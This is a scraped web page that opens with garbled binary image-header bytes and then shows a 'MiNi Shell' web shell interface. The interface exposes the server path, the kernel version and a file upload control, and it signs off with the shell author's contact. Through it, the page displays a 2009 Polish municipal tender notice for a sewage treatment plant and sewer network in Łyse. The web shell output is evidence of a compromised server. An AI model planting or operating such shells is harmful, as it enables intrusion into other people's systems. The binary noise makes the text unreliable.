JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090504/132738-N-2009.html

<p class="kh_header"><b>Łyse: Poprawa gospodarki ściekowej w Gminie Łyse poprzez rozbudowę oczyszczalni ścieków oraz budowę kanalizacji sanitarnej, ciśnieniowej z przyłączami w miejscowości Łyse</b><br>
<b>Numer ogłoszenia: 132738 - 2009; data zamieszczenia: 04.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łyse , ul. Ostrołęcka 2, 07-437 Łyse, woj. mazowieckie, tel. 029 7725027, faks 029 7725003 w. 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminalyse.pl   lub   bip.gminalyse.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa gospodarki ściekowej w Gminie Łyse poprzez rozbudowę oczyszczalni ścieków oraz budowę kanalizacji sanitarnej, ciśnieniowej z przyłączami w miejscowości Łyse.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach planowanego przedsięwzięcia planuje się rozbudowę oczyszczalni mechaniczno - biologicznej o przepustowości docelowej do 360 m3/24h w obrębie terenu zajmowanego przez istniejącą oczyszczalnię oraz budowę kanalizacji sanitarnej, ciśnieniowej z przyłączami w miejscowości Łyse.

Planowane przedsięwzięcie obejmuje:
-     instalacje mechanicznego oczyszczania ścieków składającą się z sitopiaskownika,
umieszczoną w zbiorniku istniejącego piaskownika, po jego przebudowie i zamknięciu w budynku,
-	automatyczną stację zlewczą ścieków z pomiarem i identyfikacją dostawców umieszczoną w kontenerze,
-	wykonanie pompowni ścieków własnych i dowożonych,
-	pompownię osadów,
-	dwa reaktory biologiczne z osadnikami wtórnymi, 
-	instalację odwadniania osadów nadmiernych z prasą taśmową i instalacją wapnowania - umieszczoną w nowobudowanym budynku ( 10 x 6 m ),
-	agregat prądotwórczy umieszczony w budynku odwadniania osadu,
-	studnię pomiarową ścieków oczyszczonych,
-	drogi i chodniki na terenie oczyszczalni,
-	rozbiórkę niewykorzystywanego osadnika wstępnego, 

Przebudowę oczyszczalni podyktowały następujące przyczyny: 
1. przestarzała dotychczasowa technologia oczyszczania ścieków, 
2. wyeksploatowane urządzenia technologiczne na oczyszczalni,
3. zaostrzające się unijne normy jakościowe oczyszczania ścieków.
Kanalizacja sanitarna ciśnieniowa z przyłączami w miejscowości Łyse obejmuje rozbudowę istniejącej kanalizacji sanitarnej, grawitacyjnej w układzie technologicznym ciśnieniowym z wykonaniem 242 przyłączy ciśnieniowych dla około 240 budynków jednorodzinnych i użyteczności publicznej.
Łącznie zaprojektowany układ kanalizacji sanitarnej, ciśnieniowej w niniejszym opracowaniu tworzą :
Długość  kanalizacyjnej ogółem :	18.945 mb
w tym sieć zbiorcza, ciśnieniowa:	12.671,0 mb
przyłącza ciśnieniowe  z PE Oz  40 mm - 6274 mb/ 242 szt.  		
 
Cały zakres rzeczowy robót został opisany w przedmiarze robót budowlanych, załączony do niniejszej specyfikacji.                                                                                                    
Zamówienie obejmuje również inwentaryzację geodezyjną powykonawczą oraz dokumentację powykonawczą.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.27-4, 45.25.22.00-0, 45.23.24.60-4, 45.33.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości 200.000,00 zł (słownie: dwieście tysięcy złotych) w formie, o której mowa w art. 45 ust. 6 ustawy z dnia 29 stycznia 2004 r.  Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek poosiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia.

Szczegółowe warunki udziału wykonawców w postępowaniu.
1.  Niezbędnym minimum jest wykonanie dwóch robót budowlanych , których zakres obejmował kompletną budowę oczyszczalni mechaniczno - biologicznej o przepustowości min. 360 m3/24h. Całkowita wartość każdej roboty budowlanej powinna wynosić min. 3.000.000,00 -złotych brutto. Z treści dokumentów potwierdzających, że roboty te zostały wykonane należycie powinien jednoznacznie wynikać zakres  oraz wartość. Tymi dokumentami mogą być: protokoły bezusterkowego odbioru robót, referencje , opinie, zawarte umowy , opisy przedmiotu zamówienia do umów, zapłacone faktury, itp.
2. Niezbędnym minimum jest wykonanie trzech robót budowlanych , których zakres obejmował
wykonanie systemu kanalizacji sanitarnej ciśnieniowej z przyłączami. Całkowita wartość jednej roboty budowlanej powinna wynosić minimum 1.000.000,00 złotych brutto. Z treści dokumentów potwierdzających, że roboty te zostały wykonane należycie powinien jednoznacznie wynikać zakres  oraz wartość. Tymi dokumentami mogą być: protokoły bezusterkowego odbioru robót, referencje , opinie, zawarte umowy , opisy przedmiotu zamówienia do umów, zapłacone faktury, itp.
3. Wykonawca musi dysponować osobami uprawnionymi do wykonywania   samodzielnych  funkcji technicznych w  budownictwie posiadającymi wymagane uprawnienia, w tym przynależność do właściwej izby samorządu zawodowego, z potwierdzeniem obowiązkowego ubezpieczenia od odpowiedzialności cywilnej.
3. Wykonawca musi  potwierdzić wysokość posiadanych środków finansowych lub zdolność kredytową  na kwotę minimum 4.000.000,00 zł.
4. Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  do wysokości nie mniejszej niż:
 5 000 000,- złotych  OC kontraktowe;
 1 000 000,- złotych OC deliktowe, 
z zakresem na jedno zdarzenie - 500 000,- złotych.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca spełnia warunki udziału w postępowaniu oraz, że nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty:

Dokumenty bezwzględnie wymagane:
1) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2) koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji  na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym, 
3) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub KRUS potwierdzającego odpowiedni, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zezwolenie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
4) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
5) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy Pzp, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
6)  wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, odpowiadający swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania  oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - załącznik Nr 3. 
6.1. Dokument potwierdzający wykonanie dwóch robót budowlanych , których zakres obejmował kompletną budowę oczyszczalni mechaniczno - biologicznej o przepustowości min. 360 m3/24h. Całkowita wartość każdej roboty budowlanej powinna wynosić min. 3.000.000,00 złotych brutto. Z treści dokumentów potwierdzających, że roboty te zostały wykonane należycie powinien jednoznacznie wynikać zakres  oraz wartość. Tymi dokumentami mogą być: protokoły bezusterkowego odbioru robót, referencje , opinie, zawarte umowy , opisy przedmiotu zamówienia do umów, zapłacone faktury, itp.
6.2. Dokument potwierdzający wykonanie trzech robót budowlanych , których zakres obejmował wykonanie systemu kanalizacji sanitarnej ciśnieniowej z przyłączami. Całkowita wartość jednej roboty budowlanej powinna wynosić minimum 1.000.000,00 złotych brutto. Z treści dokumentów potwierdzających, że roboty te zostały wykonane należycie powinien jednoznacznie wynikać zakres  oraz wartość. Tymi dokumentami mogą być: protokoły bezusterkowego odbioru robót, referencje , opinie, zawarte umowy , opisy przedmiotu zamówienia do umów, zapłacone faktury, itp.
7) wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca załącznik Nr 4 ,
8) pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o których mowa w pkt 7, wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował,
9) wykaz  osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, w tym osobami uprawnionymi do wykonywania   samodzielnych  funkcji technicznych w  budownictwie- załącznik Nr 5 .
10) dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Kopie uprawnień osób przewidzianych do realizacji zamówienia, w tym przynależność do właściwej izby samorządu zawodowego, z potwierdzeniem obowiązkowego ubezpieczenia od odpowiedzialności cywilnej.
11) pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 9, wykonawca wskazał osoby, którymi będzie dysponował,
12) informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy minimum 4.000.000,00 zł, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
13) polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  do wysokości nie mniejszej niż:
 5 000 000,- złotych  OC kontraktowe;
 1 000 000,- złotych OC deliktowe,
 z zakresem na jedno zdarzenie - 500 000,- złotych.
14) Wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru- załącznik Nr 1.
15) oświadczenie do postępowania o udzielenie zamówienia publicznego zgodne z art. 22 ust 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych z wykorzystaniem wzoru - załącznik Nr 2,
16) oświadczenie z art. 24 ustawy Prawo zamówień publicznych (załącznik nr 6 ).
17)	oświadczenie o spełnieniu warunków udziału w postępowaniu (załącznik nr 7).
18)	oświadczenie o udzielonym terminie gwarancji nie mniejszej niż 60 miesięcy na cały przedmiot zamówienia.
19)	kosztorysy. Wykonawca    winien w swoim kosztorysie wykazać wszystkie składniki cenotwórcze, które są niezbędne do wykonania zamówienia , w tym cena 1 roboczogodziny z narzutami, zestawienie materiałów, zestawienie sprzętu,  itp. 
20)	harmonogram rzeczowo - finansowy robót.
21)	pełnomocnictwo - w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego. Pełnomocnictwo (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) do podpisania oferty winno być dołączone do oferty, o ile nie wynika to z  innych dokumentów załączonych do oferty (np. z odpisu z rejestru handlowego, zaświadczenia o wpisie do ewidencji działalności gospodarczej).
22)	dowód wniesienia wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gminalyse.pl    lub    bip.gminalyse.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy
ul. Ostrołęcka 2,
07-437 Łyse.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2009 godzina 10:00, miejsce: Urząd Gminy, 07-437 Łyse, ul. Ostrołęcka 2, sekretariat - piętro I, pokój 22.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com